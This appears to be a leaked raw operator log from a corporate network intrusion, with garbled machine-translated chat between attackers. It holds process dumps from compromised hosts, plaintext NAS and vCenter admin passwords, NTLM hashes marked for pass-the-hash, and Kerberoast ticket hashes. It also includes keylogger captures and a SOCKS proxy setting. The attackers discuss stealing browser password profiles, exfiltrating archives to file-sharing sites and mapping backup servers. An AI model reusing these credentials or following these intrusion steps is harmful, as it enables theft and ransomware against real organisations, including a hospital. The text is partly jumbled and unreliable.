iexplore.exe 8428 RDP-Tcp#2 2 2 15,788 K WATERWAY\mapusatera 0:00:01
chrome.exe 25160 RDP-Tcp#2 2 46,956 K WATERWAY\mapusatera 0:00:01
svchost.exe 20296 Services 0 6,696 K NT AUTHORITY\SYSTEM 0:00:00
chrome.exe 12184 RDP-Tcp#2 2 176,704 K WATERWAY\mapusatera 0:01:30
chrome.exe 6468 RDP-Tcp#2 2,104,252 K WATERWAY\mapusatera 0:00:04
chrome.exe 21264 RDP-Tcp#2 2 52,912 K WATERWAY\mapusatera 0:00:00
chrome.exe 14704 RDP-Tcp#2 2 2 64,868 K WATERWAY\mapusatera 0:00:01
chrome.exe 18672 RDP-Tcp#2 2 64,892 K WATERWAY\mapusatera 0:00:02
chrome.exe 21156 RDP-Tcp#2 2 50,592 K WATERWAY\mapusatera 0:00:00
chrome.exe 24160 RDP-Tcp#2 2 96,412 K WATERWAY\mapusatera 0:00:03
chrome.exe 22756 RDP-Tcp#2 2 50,880 K WATERWAY\mapusatera 0:00:00
chrome.exe 8320 RDP-Tcp#2 2 2 88,032 K WATERWAY\mapusatera 0:00:02
chrome.exe 23780 RDP-Tcp#2 2 2 51,092 K WATERWAY\mapusatera 0:00:00
svchost.exe 18788 Services 0 15,468 K NT AUTHORITY\LOCAL SERVICE 0:00:00
SettingSyncHost.exe 25812 RDP-Tcp#2 2 6,176 K WATERWAY\mapusatera 0:00:00
svchost.exe 10760 Services 0 11,264 K NT AUTHORITY\SYSTEM 0:00:00
WmiPrvSE.exe 21536 Services 0 10,624 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 12976 Services 0 20,216 K NT AUTHORITY\SYSTEM 0:00:00
devenv.exe 21676 RDP-Tcp#2 2,505,908 K WATERWAY\mapusatera 0:00:40
PerfWatson2.exe 1648 RDP-Tcp#2 2 70,476 K WATERWAY\mapusatera 0:00:02
Microsoft.ServiceHub.Cont 3392 RDP-Tcp#2 2 57,436 K WATERWAY\mapusatera 0:00:01
conhost.exe 5328 RDP-Tcp#2 2 10,772 K WATERWAY\mapusatera 0:00:00
ServiceHub.VSDetouredHost 6328 RDP-Tcp#2 2 80,500 K WATERWAY\mapusatera 0:00:03
ServiceHub.IdentityHost.e 22516 RDP-Tcp#2 2 99,428 K WATERWAY\mapusatera 0:00:05
conhost.exe 23400 RDP-Tcp#2 2 2 10,752 K WATERWAY\mapusatera 0:00:00
conhost.exe 22260 RDP-Tcp#2 2 10,744 K WATERWAY\mapusatera 0:00:00
ServiceHub.SettingsHost.e 3612 RDP-Tcp#2 2 111,168 K WATERWAY\mapusatera 0:00:03
conhost.exe 23096 RDP-Tcp#2 2 2 10,772 K WATERWAY\mapusatera 0:00:00
ServiceHub.Host.CLR.x86.e 3112 RDP-Tcp#2 2 62,536 K WATERWAY\mapusatera 0:00:01
conhost.exe 2992 RDP-Tcp#2 2 2 10,748 K WATERWAY\mapusatera 0:00:00
ServiceHub.RoslynCodeAnal 19432 RDP-Tcp#2 2 295,244 K WATERWAY\mapusatera 0:00:11
conhost.exe 19164 RDP-Tcp#2 2 10,752 K WATERWAY\mapusatera 0:00:00
ServiceHub.ThreadedWaitDi 18648 RDP-Tcp#2 2 71,792 K WATERWAY\mapusatera 0:00:02
conhost.exe 8992 RDP-Tcp#2 2 10,764 K WATERWAY\mapusatera 0:00:00
sqlservr.exe 2800 RDP-Tcp#2 2,381,244 K WATERWAY\mapusatera 0:00:10
ServiceHub.Host.CLR.x86.e 24636 RDP-Tcp#2 2 83,308 K WATERWAY\mapusatera 0:00:03
conhost.exe 24708 RDP-Tcp#2 2 2 10,760 K WATERWAY\mapusatera 0:00:00
ServiceHub.TestWindowStor 15700 RDP-Tcp#2 2 2 63,176 K WATERWAY\mapusatera 0:00:01
conhost.exe 10360 RDP-Tcp#2 2 2 10,776 K WATERWAY\mapusatera 0:00:00
ServiceHub.Host.CLR.x86.e 20912 RDP-Tcp#2 2 63,996 K WATERWAY\mapusatera 0:00:01
conhost.exe 4388 RDP-Tcp#2 2 2 10,752 K WATERWAY\mapusatera 0:00:00
chrome.exe 22888 RDP-Tcp#2 2 120,740 K WATERWAY\mapusatera 0:00:12
chrome.exe 23436 RDP-Tcp#2 2,123,468 K WATERWAY\mapusatera 0:00:08
chrome.exe 23980 RDP-Tcp#2 2,101,556 K WATERWAY\mapusatera 0:00:03
chrome.exe 24536 RDP-Tcp#2 2 2 95,496 K WATERWAY\mapusatera 0:00:02
chrome.exe 18072 RDP-Tcp#2 2 2,424 K WATERWAY\mapusatera 0:00:04
devenv.exe 17440 RDP-Tcp#2 2 548,328 K WATERWAY\mapusatera 0:01:08
PerfWatson2.exe 19876 RDP-Tcp#2 2 66,292 K WATERWAY\mapusatera 0:00:01
Microsoft.ServiceHub.Cont 3400 RDP-Tcp#2 2 2 55,544 K WATERWAY\mapusatera 0:00:01
conhost.exe 3436 RDP-Tcp#2 2 2 10,748 K WATERWAY\mapusatera 0:00:00
ServiceHub.VSDetouredHost 24196 RDP-Tcp#2 2 80,520 K WATERWAY\mapusatera 0:00:03
ServiceHub.IdentityHost.e 17652 RDP-Tcp#2 2 96,368 K WATERWAY\mapusatera 0:00:05
conhost.exe 19700 RDP-Tcp#2 2 2 10,760 K WATERWAY\mapusatera 0:00:00
conhost.exe 13384 RDP-Tcp#2 2 10,740 K WATERWAY\mapusatera 0:00:00
ServiceHub.RoslynCodeAnal 14756 RDP-Tcp#2 2 271,108 K WATERWAY\mapusatera 0:00:07
conhost.exe 9688 RDP-Tcp#2 2 10,760 K WATERWAY\mapusatera 0:00:00
ServiceHub.ThreadedWaitDi 20588 RDP-Tcp#2 2 71,472 K WATERWAY\mapusatera 0:00:01
conhost.exe 8224 RDP-Tcp#2 2 2 10,748 K WATERWAY\mapusatera 0:00:00
ServiceHub.Host.CLR.x86.e 22956 RDP-Tcp#2 2 2 61,828 K WATERWAY\mapusatera 0:00:01
conhost.exe 13400 RDP-Tcp#2 2 2 10,732 K WATERWAY\mapusatera 0:00:00
ServiceHub.SettingsHost.e 23348 RDP-Tcp#2 2 113,756 K WATERWAY\mapusatera 0:00:07
conhost.exe 25440 RDP-Tcp#2 2 2 10,732 K WATERWAY\mapusatera 0:00:00
ServiceHub.Host.CLR.x86.e 18560 RDP-Tcp#2 2 57,704 K WATERWAY\mapusatera 0:00:01
conhost.exe 11608 RDP-Tcp#2 2 2 10,732 K WATERWAY\mapusatera 0:00:00
svchost.exe 26356 Services 0 7,628 K NT AUTHORITY\SYSTEM 0:00:00
ScriptedSandbox64.exe 4112 RDP-Tcp#2 2 43,492 K WATERWAY\mapusatera 0:00:00
WmiPrvSE.exe 23456 Services 0 15,020 K NT AUTHORITY\NETWORK SERVICE 0:00:04
chrome.exe 21960 RDP-Tcp#2 2 23,100 K WATERWAY\mapusatera 0:00:00
``Give me a list of processes192.168.0.164 I'd like to see his car,`` for now,`` I don't have a car in coba,`` have you looked exactly,`` I think the post office has looked at something else or his mail,``
>memberOf: CN=Veeam Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Senior Ops,OU=WWW2K Security,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=IT,OU=WW2K Security,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Hyper-V Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Nimble Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=ITStaff,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Office,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=OfficeSQL,OU=SQLGroups,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=OnlyOffice,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Schema Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Enterprise Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Domain Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
Do you have it? mapusateraatam also not saved even on the rd went to someone I do not remember someone exactly had and the rest do not mention nimbla in the stories? even somharper or with blauer? with gkellera who do you work with?
PID PPID Name Arch Session User
--- ---- ---- ---- ------- ----
0 0 [System Process]
4 0 System x64 0 NT AUTHORITY\SYSTEM
324 4 smss.exe x64 0 NT AUTHORITY\SYSTEM
488 480 csrss.exe x64 0 NT AUTHORITY\SYSTEM
556,544 csrss.exe x64 1 NT AUTHORITY\SYSTEM
564 480 wininit.exe x64 0 NT AUTHORITY\SYSTEM
652 564 services.exe x64 0 NT AUTHORITY\SYSTEM
292 652 svchost.exe x64 0 NT AUTHORITY\SYSTEM
10452 292 taskhostex.exe x64 2 WATERWAY\Administrator
11364 292 taskhostex.exe x64 3 WATERWAY\gkeller
356 652 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
500 652 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
784 652 ntfrs.exe x64 0 NT AUTHORITY\SYSTEM
820 652 svchost.exe x64 0 NT AUTHORITY\SYSTEM
9264 820 WmiPrvSE.exe x64 0 NT AUTHORITY/UNETWORK SERVICE
12292 820 RuntimeBroker.exe x64 2 WATERWAY\Administrator
864 652 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
992 652 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
1124 652 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1248 652 ismserv.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1520 652 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM
1548 652 Microsoft.ActiveDirectory.WebServices.exe x64 0 NT AUTHORITY\SYSTEM
1600 652 dfsrs.exe x64 0 NT AUTHORITY\SYSTEM
1632 652 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
1648 652 svchost.exe x64 0 NT AUTHORITY\SYSTEM
1668 652 dns.exe x64 0 NT AUTHORITY\SYSTEM
1688 652 EPIntegrationService.exe x64 0 NT AUTHORITY\SYSTEM
1820 652 EPProtectedService.exe x64 0 NT AUTHORITY\SYSTEM
1900 652 bdredline.exe x64 0 NT AUTHORITY\SYSTEM
1956 652 EPSecurityService.exe x64 0 NT AUTHORITY\SYSTEM
10412 1956 EPConsole.exe x64 2 WATERWAY\Administrator
11292 1956 EPConsole.exe x64 3 WATERWAY\gkeller
2012 652 EPUpdateService.exe x64 0 NT AUTHORITY\SYSTEM
2020 652 pg_ctl.exe x86 0 NT AUTHORITY\SYSTEM
2300 2020 postgres.exe x86 0 NT AUTHORITY\SYSTEM
2324 2300 conhost.exe x64 0 NT AUTHORITY\SYSTEM
2368 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
2452 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
2560 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
2580 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
7248 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
7260 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
72882 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
7324 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
8348 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
8372 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
8392 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
8412 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
8432 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
8452 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
8472 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
8492 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
8512 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
8532 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
8616 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
9952 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
10760 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
11244 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
11656 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM
2292 652 wbserver.exe x86 0 NT AUTHORITY\SYSTEM
2424 652 wlcollector.exe x86 0 NT AUTHORITY\SYSTEM
2444 652 apache.exe x86 0 NT AUTHORITY\SYSTEM
2196 2444 Apache.exe x86 0 NT AUTHORITY\SYSTEM
2516 652 Apache.exe x86 0 NT AUTHORITY\SYSTEM
2680 2516 Apache.exe x86 0 NT AUTHORITY\SYSTEM
2544 652 Apache.exe x86 0 NT AUTHORITY\SYSTEM
2244 2544 Apache.exe x86 0 NT AUTHORITY\SYSTEM
2592 652 Apache.exe x86 0 NT AUTHORITY\SYSTEM
1588 2592 Apache.exe x86 0 NT AUTHORITY\SYSTEM
2632 652 Apache.exe x86 0 NT AUTHORITY\SYSTEM
2604 2632 Apache.exe x86 0 NT AUTHORITY\SYSTEM
2668 652 dfssvc.exe x64 0 NT AUTHORITY\SYSTEM
9540 652 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
10584 9540 rdpclip.exe x64 2 WATERWAY\Administrator
11336 9540 rdpclip.exe x64 3 WATERWAY\gkeller
9648 652 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE
9696 652 vds.exe x64 0 NT AUTHORITY\SYSTEM
9768 652 svchost.exe x64 0 NT AUTHORITY\SYSTEM
9804 652 svchost.exe x64 0 NT AUTHORITY\SYSTEM
9832 652 svchost.exe x64 0 NT AUTHORITY\SYSTEM
9920 652 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
10020 652 VSSVC.exe x64 0 NT AUTHORITY\SYSTEM
660 564 lsass.exe x64 0 NT AUTHORITY\SYSTEM
592 544 winlogon.exe x64 1 NT AUTHORITY\SYSTEM
948 592 logonUI.exe x64 1 NT AUTHORITY\SYSTEM
1000 592 dwm.exe x64 1 Window Manager\DWM-1
1464 1468 csrss.exe x64 2 NT AUTHORITY\SYSTEM
1760 2972 csrss.exe x64 3 NT AUTHORITY\SYSTEM
2756 2972 winlogon.exe x64 3 NT AUTHORITY\SYSTEM
2788 2756 dwm.exe x64 3 Window Manager\DWM-3
9308 1468 winlogon.exe x64 2 NT AUTHORITY\SYSTEM
10276 9308 dwm.exe x64 2 Window Manager\DWM-2
9708 10044 mstsc.exe x86 0 NT AUTHORITY\SYSTEM
10652 10616 explorer.exe x64 2 WATERWAY\Administrator
10968 10652 wsc.exe x86 2 WATERWAY\Administrator
11200 10652 CCleaner64.exe x64 2 WATERWAY\Administrator
12136 10652 chrome.exe x64 2 WATERWAY\Administrator
2932 12136 chrome.exe x64 2 WATERWAY\Administrator
9428 12136 chrome.exe x64 2 WATERWAY\Administrator
11268 12136 chrome.exe x64 2 WATERWAY\Administrator
11440 12136 chrome.exe x64 2 WATERWAY\Administrator
11468 12136 chrome.exe x64 2 WATERWAY\Administrator
12092 12136 chrome.exe x64 2 WATERWAY\Administrator
11620 11560 explorer.exe x64 3 WATERWAY\gkeller
9384 11620 wsc.exe x86 3 WATERWAY\gkeller
12000 11388 ServerManager.exe x64 3 WATERWAY\gkeller
12224 12000 mmc.exe x64 3 WATERWAY\gkeller
If request for credits from the browser and 7za.exe spam such processes, then maybe it's our doing?
5244 2916 cmd.exe x64 1 NT AUTHORITY\SYSTEM
5260 5252 explorer.exe x64 2 WATERWAY\Administrator
5800 608 mstsc.exe x86 1 NT AUTHORITY\SYSTEM
5848 10672 conhost.exe x64 1 NT AUTHORITY\SYSTEM
5936 6076 conhost.exe x64 1 NT AUTHORITY\SYSTEM
6076 2916 cmd.exe x64 1 NT AUTHORITY\SYSTEM
6108 10488 conhost.exe x64 1 NT AUTHORITY\SYSTEM
7480 10060 conhost.exe x64 1 NT AUTHORITY\SYSTEM
7720 6076 tasklist.exe x64 1 NT AUTHORITY\SYSTEM
8988 10488 tasklist.exe x64 1 NT AUTHORITY\SYSTEM
9108 5244 tasklist.exe x64 1 NT AUTHORITY\SYSTEM
9620 5244 conhost.exe x64 1 NT AUTHORITY\SYSTEM
10060 5800 cmd.exe x86 1 NT AUTHORITY\SYSTEM
10488 2916 cmd.exe x64 1 NT AUTHORITY\SYSTEM
10672 5800 cmd.exe x86 1 NT AUTHORITY\SYSTEM
11156 11164 conhost.exe x64 1 NT AUTHORITY\SYSTEM
11164 2916 cmd.exe x64 1 NT AUTHORITY\SYSTEM
11228 11164 tasklist.exe x64 1 NT AUTHORITY\SYSTEM
he last time he visited this urral was on october 20th i don't think they're that worried that only one person+no, also clean forms, i'll try to see if he has a lustpass in chrome and no password? blauer also or did you only take chrome off any other person in the history no nimbla? by the way about other italian people in this network only problem with nimbla i still have 2 crits with access there
192.168.0.3 Waterway 11915Wnas2179!
``That's what you found,`` isn't it?
http://192.168.0.3:5000/ WW99NAS - Synology DiskStation
``From the premium pornhub I wish I'd gotten it in some kind of grid and the credits from steem, league of legends and meinkraft.
388 https:// www.dragonawaken.com 40
389 http:// www.9minecraft.net 100
``There's a different process to put? + he has 4 monitors there or what)`` clearly writes skul query and here lke = like`re ea lke c'[F5]`` it seems to me that he has a different layout or koba trojit?
SQLQuery4.sql - wwng-prod.database.windows.net.WWNG (wwng-admin (82))* - Microsoft SQL Server Management Studio
=======
re ea lke c'[F5]
SQLQuery3.sql - wwng-prod.database.windows.net.WWNG (wwng-admin (80))* - Microsoft SQL Server Management Studio
=======
hee si[tab][control]
Waterway IT - Agent - Mozilla Firefox
=======
, h,.isom frmv. Plseley e no .cel
i [backspace]oul bsbe[backspace][backspace][backspace][backspace][backspace][backspace]s odpo e
``Turn off the juice of one of them, let it browse further while it's on the monitor```
Waterway IT - Agent - Mozilla Firefox
=======
Ry,
ee et ac tntkwif re shi el eed
``He's writing something in Tuvan there, I've only put the logbook there to help)[ ](https://mediaeveryone.com/group/waterway-com?msg=CReq7aL7Fw5fhS8Su) .))[ ](https://mediaeveryone.com/group/waterway-com?msg=av7QT8QTmaZMn6nwC) .no, the nimble address of the car itself?
setg Proxies socks4:209.222.97.8:5543
``and ip adr to log in sock from his tachka+password is the same? https://www.sendspace.com/file/dudf68не fully uploaded the archive that by the way was normal?yes i would be glad to fill me a normal archive) in the browser cleanly not to watch the control panel dkmen and watched vidosikon came at the most inopportune moment if that herehttp://www.howtogeek.com/679085/how-to-view-a-saved-password-in-firefox/ԁавы by rdp went? can not open the file as archive`tghiWERm4234A`
https://qaz.im/load/f3hhRs/zB3ahSсюда uploadqaz.im and encrypt the file names under the password here you will endlessly upload to a third-party resource increase the size of the files + upload me a profile and by rd there check idletime did not worka ok only make a backup of your own make it necessary to delete your files and upload them in the current profile of the browser, then rdnu I get into the profiles folder downloaded profile no profile come? there is a folder let's take the folder away then we can also take the folder away yes
====== IdleTime ======
CurrentUser : WATERWAY\mharper
Idletime : 07h:54m:42s:515ms (28482515 milliseconds)
``check his idletime and on rdp)`` why? I downloaded the folder with the profile ffrebut just rebooted? computer off? it looks like the computer rebooted from the network did not throw out? ping servers and all ready did not find the
total for hell 1726
160 servers
1550 armies
16 eksha,nasa,linpoka nothing,1 subnet only scanned vg have what? + on the backup server hangs the cloud service process, but on rdp under another user does not see any settings that backups go to the cloud - all other settings backups are visible. Maybe it's just service hanging, but they're not using it. As they are gone, you can check on the rdp
```
Veeam.Backup.CloudService 4676 Services 0 209,772 K VEEAM01\Administrator 0:03:16
``Backups - vm and filestores
```
10.1.20.183 VEEAM01.main.crispregional.org E:
G:
192.168.9.124 ts1400backup.main.crispregional.org NAS admin\cr1spy173 format disk
10.1.0.22 CRHSBACKUP.main.crispregional.org D:DATAPART1
10.10.1.43 itunitynas.main.crispispregional.org NAS Bookmark \backup, access by YES
``macaffi server
```
https://it-admin:8443/core/ works by rdp (10.1.20.113)
Administrator
cr1spy173
``great) in the center
```
https://crhsvcenter7.main.crispregional.org/ui/
Administrator@main.crispregional.org
cr1spy173
``Domain Admins
```
th MAIN\Administrator e25c3e50d7638936c2f2ee77eebb1f24 cr1spy173
pth MAIN\Allscripts_Admin 19a1901a003621a6e1abd6edb0e7cf0b
pth MAIN\allscripts_services 19512cc1b7dc97e7e302f34a2245cabe
pth MAIN\AllscriptsSQL 6a8e1d103a88ea3dc2a012d34e544e99
pth MAIN\blove 7bef985313e414bb847c4dcd6c7c6826
pth MAIN\htservice 0cf803b54e919bc11e75c48ea596eb92
pth MAIN\meditech-admin d28f5c2d3ea915737812fbdeb4ea4c79
pth MAIN\meditech d28f5c2d3ea915737812fbdeb4ea4c79
pth MAIN\nodom 9255c608109b78b60fc048e84b7926aa
pth MAIN\rthomas 6f0b655dac0046d92eb3fec69ba6aece
pth MAIN\tcoppedge 06a1064c70fa0e250e81eddc4f046dacc
pth MAIN\amhs-admin 443abd60ece7cfb885a54fd2ba35ffcb
pth MAIN\dragon 6a8e1d103a88ea3dc2a012d34e544e99
pth MAIN/jwashburn1 fc98da86ebcc76100a0e62c22d0bd2ca
pth MAIN\pbodrey 300249ae0b204470a430295a2dc30a07
pth MAIN\smaxwell 87a628063ebb1e790221800f8ed76d16
pth MAIN\ashleys 4f3d00492c0d5219ba173c26fc1694ef
pth MAIN\MBAM-RW-SVC 04a88994cf7db5a0e8730e4effd73742
pth MAIN\mhiers 3b3000484afdc685a779399548e76d9e
pth MAIN\rlagrone 438eb0f2356b0f16719a307919e583c6
pth MAIN\spf_svcs e25c3e50d7638936c2f2ee77eebb1f24
pth MAIN\helpdesk 0219040d969969400d4253ff874683fd9f8
``C:\projects\default\temp
BBCTX6 @ MAPCIASP\bbbwalkerj
@sleep don't forget to kill the sessionKerb removal, sent T2snap don't forget to clean files@help @sleep all native commands go through @link to the module for the nativ and the desired yusejHow to write? Describe how it should work? I will create a request to add in the personal where to write? and do not load modules from the guitar write more simply that I would like to add as nativman on tpsh is unlikely to be at the topLeft I have no white background) blackZmek there you will see a boxPAYLOAD Writes at the top left in white on a white backgrounda bug interface it is Need a man on this TPS and the ability to create the load in tpsh threw the session immediately progress went what the day did` ``
TicketByteHexStream :
Hash : $krb5tgs$23$*Administrator$mapciasp.com$MSSQLSvc/ASPSIM1
.mapciasp.com*$E6D520476D906211380CC186A408408A$477E6AD1
027370F111C08A4F9D31A485DFB34A2E0CDE1C1E35C0AD0A397F5411
77B986A5AB111E4AE415B2A24216698CF96182258B4AE04326E780A3
72B1E0F654BDAECA95910323DA4EBC9DA3336CE912261C1B0FD819FC
F74B533EC0CA4447898247A30CCA9C524C8F36E5D7303D14EFAA0586
3254A757DED5838BAB90C18C7E6CF3AFC2108EA302D77002C66EFBE4
2EFA329788900F51F341A6AF5F2E7091316C7110264B78F3EE9615EF
7471CA782782727064EDD406C0D72AADA04E58548A4178AF93B734FB
950FECA0227BB34B7C9B33DA0416A0BE8628211769BB93AF23B4DB5A
72373C273633D31CAC0ACB5F1523B613371B323ACC54D379E7427260
A9632A9AFCBFB76AD92DE49E74AE080071455E4FA7981C878A5A20F8
1099EBFEEA4DCC48FC4D6D9DF7ED5324956DA34C84EFB8D3604C3F1B
BC255D033071CF6FF7971FFAAA716D7CFC27987C005E2FC95A139C81
C1B4EBBDE8E387B43D6678478EA9821DA4A3865854C73723227F4ED2
6C7E78B6B8D2018F7C450D3369DA404ED7DA204714B8D756C2F035FA
98554E28CE6E00ADEE069CC881B6EB233E1F2F4C59A369685E9FBAE2
B80CAAB77664628DA70C70EAA0CC91DC837B8C97B208B1141F7E2ED8
8602C53E8E49938CECCF88D45510906F5683DD3DF368063A30CCFA19
2F78D133D699B3CCDA149F2BEF8D80D6BF88DA1340D5F31546A95DA9
B60AAA2C2717F8DB443111651A94522D2F6DFA12D2C4DA7E990EDA84
EDBB8444528CF879DE065E1FA84D9BA1683E284E464197B1B227F02B
66E0BA9FD900A5D638F106BA8F614E277581110579EAA06AAFE60127
0D542CE4D35660B9EEFD4022D442C1DA40EB47ABCF1EB8B9D262161D
E6A1830EB3CE6ABF5C0370ACA46CAF89C4D33B0684B3E7031458CDD6
BEE84722E8CAF716C758EBE6268B2D2D3DD7D918A19E88DF8E6F817C
BE5AEBDEC12A466FF61114E10FDF24D8B00E7F8AFBB06078B1FFBAEF
6106D73EFC1837BC7A2ABC3F3471A9D01B519249618A7ADB9AEB9769
D1546EAE78A06781D5B966438851EBD25E9C2D5A4E4ED27951089B67
A5A993EB6C6A8F5C3F14D69A88674F2E1A8D105F8CB88A31A244216D
EDAA7DC6785B2AD012E34BE49EA8D6A8A272EDFDA4BFC7959E5FF88E
6248913FBB10C2AAAE11BE6AA549215A5DAB25E85D215DE3873BA51E
B0088846C4D467C514788D6D1A51A71937C04189F52978114B8B9146
EC0E2833E85E586181F292E0FEABDE42C9C27785800A49531E45313B
AC2DD1BB832C97E48663D151E0907C880BD0370E31E89C469C7C156F
02C764B84A5A7D2C82236426787689554602A9829D9BFF087B6E9218
14E1D3BBA77181A6525B2448E209777518EC5299168D6ED6A2A0E277
F5303F213008B834550A11188B889EED75D5C527E11764F6AFC6A80C
DD35D1344BAD3448689F46EB4F05DCDBCE5506C66B5A18EF28785D28
0BD2A2B0D4C79D6EEF3B59C759B3639BCE6AE94FE3B79BFA5F809029
EDC96318B6AC8AB73A950839E1447A6F5FB74F415C419B1B46DE1A37
769C6D1A68CF52F297906F2CCD7916BA95E0A7833534860A7A5C2177
22628FB126F7857C7FFCE66DC3A568EC9EDCE245D5D7C591F3867A36
080DB0248E6AE2FD1BDE8D4C91DFE21105C925AEFAB72128269CC10E
6FABD90380
SamAccountName : Administrator
DistinguishedName : CN=Administrator,CN=Users,DC=mapciasp,DC=com
ServicePrincipalName : MSSQLSvc/ASPSIM1.mapciasp.com
TicketByteHexStream :
Hash : $krb5tgs$23$*sccmservice$mapciasp.com$MSSQLSvc/ASPSQL02.
mapciasp.com*$602430A17C9A29DAC8460019FEC6DF34$6BF0FC887
628A0937D628447D19956873A219C2ADBAB932D9E66C922DEC7687B8
4ABE8148EDFC7280F311560DAEB54432195E0F82EADC326FFDF75D99
B135C62EEB85BDBF97D71B2621E04E58F6725779024977914AB87B64
D11546BA1CBBC5B572A72549DDFBB498A16C9E12C4D5EE5080FE4073
AE6793FF6712FA00646B2E9C768485F3657810FA466BAED06B96CA34
22C1B5B3B889A286A87B4F421998424527F2EC7D47D44B7B92C30517
4A9EC5AC78665E8F6E00E5C662B651C7E7BCAC36800431B057E6F040
19D4D11F2DA190D8B3B499B9B59980B10C608142C52234C5A22F0ACC
99F6885E061CCB84B37FFDE988A61D3A4D57A37E453C0D0C088FB018
C6609E9EB56AAC276AF13E3756EE4D08459774DF8B3F5BB0B88FE7F0
95170DF8BB8E7BAD2FBD0BF80A9A2D955122A1347D3463173272D26D
9A73FA9D936B9022F21556CA3F4003444E14C6AABC2934D824308536
3EFD5D6747E0F35D216937761B1EAD321492D8334A36EFED08E0CC3F
91DAB8269EAA4B8F06E45CAD95982E247B6AA5169EA3F4EECC779C7C
32C347E6396C89D830A77119826C9B5B039910A6F8C07C36C477E99C
CB2DC1175194598FB29565654B9A3B6E455A3448950D32B0972C2BAE
AAABC5CB82DC4BC47BA272CD57D2C002DC6B123D24285BED35092A6E
14BF7CD42BA66FFEA1C0AF120C555F2101C7B962B0562BFF71FC9317
15B2EE403D5A36F76289D2FBC283C41BA387D13AA7535F4BD48B8F4F
E81FE4331F1A43DAED8DD67A8B990219C068EC9449473C36739F2773
41D1D118EE57AF8E1824B089CFC78F5CD22FD3E78923965AF0B21768
DDE4CB821E40C6AD00184710C4F0AA0807C2A703968BED888A427791
3395DA98F7084F53A2DBC07BD85C1863649ED5BC308B8429D1BCEFE3
062C5BFC5D5537192FA7D73F4ECADBF306AD55F0AE2305C3A19F4D06
62038B7BAA87772614817D1B271391680AF64155C952D1565B826554
E67C452544B3EFD95A2BBBF74F2E5BBDCD5FD8420BCB3A8E9146CD60
7223752AF2309C2DDDC2AEE6771C9D1CA1945E54F5747DEC939154D5
49A80AF35543E72BF8FED7E29E3C43B9241CC402C08C3D3AF10EA2BE
53DC0AD884D67B1D9201F45899A9C7AF169E99BB6038A7FE96F79CA8
AEC36DC2C7ED30DF500DB99E26466B2EEE540125CB9F7770439687B9
64020E0B0B3A865BDC7AF938AA137A88D15BFFA372318A73ACBEF568
9DD10A4A4AC31231C31A22AD5365FD27A9ADEA22B0982415AAE53773
1DCC7576EBC1564DFB45821F3A98457899BE4C3C15964C31F9B95703
EE81CF3186A4C815ACE960650371823A0A4F227C955F5BE0250C459E
7C9577F855E7CA200CCE38B2087333825635E727EFD97B915D7BBE1F
8E34753EA955F8C128DF362C831C115433CFD064C35F4DD35918100C
2D7431D040D23C4A9E4E66BC7AF58CA9AAEB658B7A7E334A30B527B8
D05A6812847831467111BD0D0E32BCE4F349F4D893F4001BC5CD1596
49E95D33396DF5AC02A9C0DFC29DFB33EAD471289EE5E59730BC1C57
5E0A6F3066B6E967039EA21EA545428A6566FEBE73657915EA740C02
91BA145DD3059FF043B1B6880F629D11C91DB0E596BD56069BA4E323
78905550C6A7A0507A3269634FC8D41854B02025B6A9185E922C4D83
A23105581
SamAccountName : sccmservice
DistinguishedName : CN=sccmservice,OU=Service Accounts,DC=mapciasp,DC=com
ServicePrincipalName : MSSQLSvc/ASPSQL02.mapciasp.com
TicketByteHexStream :
Hash : $krb5tgs$23$*aspsql2svc$mapciasp.com$MSSQLSvc/ASPSQL2.ma
pciasp.com:1433*$7FBB03B44CB498CEA3660DC0F17F4326$CEB193
BE15A7B0299BEBE7BAB2A50A7A53EA924FC555D8111667F9AB4DE458
